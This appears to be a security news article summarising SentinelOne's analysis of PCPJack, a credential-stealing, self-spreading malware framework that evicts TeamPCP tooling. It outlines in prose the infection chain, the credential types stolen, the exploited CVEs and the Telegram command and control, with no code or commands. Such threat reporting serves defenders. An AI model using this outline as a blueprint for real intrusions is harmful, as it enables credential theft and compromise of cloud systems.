A threat actor has launched a campaign to clean up environments infected by the infamous TeamPCP hacking group and deploy its own malicious tools, SentinelOne reports.
Active since late April, the campaign relies on a malware framework targeting credentials across multiple cloud environments and capable of propagating itself.
SentinelOne has named the framework PCPJack, due to its focus on removing from the infected systems any tools and artifacts associated with TeamPCP, the hacking group behind a recent flurry of supply chain attacks targeting multiple open source software ecosystems.
“Many of the services targeted by the PCPJack framework are similar to the early TeamPCP/PCPCat campaigns from December 2025, before the high-visibility campaigns of early 2026 brought significant attention to TeamPCP and purportedly led to changes in group membership. We believe this could be a former operator who is deeply familiar with the group’s tooling,” SentinelOne says.
A PCPJack infection, the cybersecurity company says, begins with a Linux shell script that sets up the environment and fetches additional payloads. Before that, it searches the system for processes and artifacts matching known TeamPCP infections and removes them.
Next, the script creates a Python virtual environment, downloads six modules from an AWS S3 bucket, renames them, establishes persistence, launches the first module, which serves as the main framework orchestrator, and then deletes itself.
The remaining modules, which are imported by the orchestrator, were designed for specific purposes, including credential parsing, lateral movement, command-and-control (C&C) message encryption, cloud IP range lookups, and cloud scanning.
From the local system, PCPJack can steal .env and configuration files, environment variables, SSH keys, cryptocurrency wallets, credentials, and tokens for various web apps and cloud services, including AWS, Kubernetes, Docker, Gmail, GitHub, Office 365/Outlook, RayML, Slack, and WordPress.
“The types of credentials collected by the framework suggest PCPJack’s targeting motivations are primarily to conduct spam campaigns and financial fraud, or to simply monetize stolen credentials to actors with these focuses. The inclusion of enterprise productivity software like Slack and business database services expands the focus to extortion attacks,” SentinelOne says.
PCPJack performs system reconnaissance to identify assets the machine connects to, attempts lateral movement, and downloads Parquet files from Common Crawl to identify additional targets over the internet and attempt to infect them.
The spreading module targets known vulnerabilities in web applications, including CVE-2025-29927 (Next.js), CVE-2025-55182 (React2Shell), CVE-2026-1357 (WPVivid Backup plugin for WordPress), CVE-2025-9501 (W3 Total Cache plugin for WordPress), and CVE-2025-48703 (CentOS Web Panel).
PCPJack also attempts to use the extracted credentials to propagate across Kubernetes, Docker, Redis, RayML, and MongoDB deployments, and leverages SSH keys to execute the initial script on remote machines. The framework uses Telegram for C&C and encrypts the data sent to its channel.
During its investigation into the framework, SentinelOne identified a second toolset associated with the threat actor, which includes Sliver implants and credential theft across dozens of cloud services, including Anthropic, Digital Ocean, Discord, Google API, and others, as well as those targeted by PCPJack.
“Overall, the two toolsets are well developed and indicate that the owner values making code as a modular framework, despite some redundancies in behavior. The occasional operational security lapses were interesting, particularly their choice to encrypt everything except for Telegram credentials and their own alleged infrastructure,” SentinelOne notes.
Related: Vendor Says Daemon Tools Supply Chain Attack Contained
Related: AI Coding Agents Could Fuel Next Supply Chain Crisis
Related: 1,800 Hit in Mini Shai-Hulud Attack on SAP, Lightning, Intercom
Related: Sophisticated Quasar Linux RAT Targets Software Developers
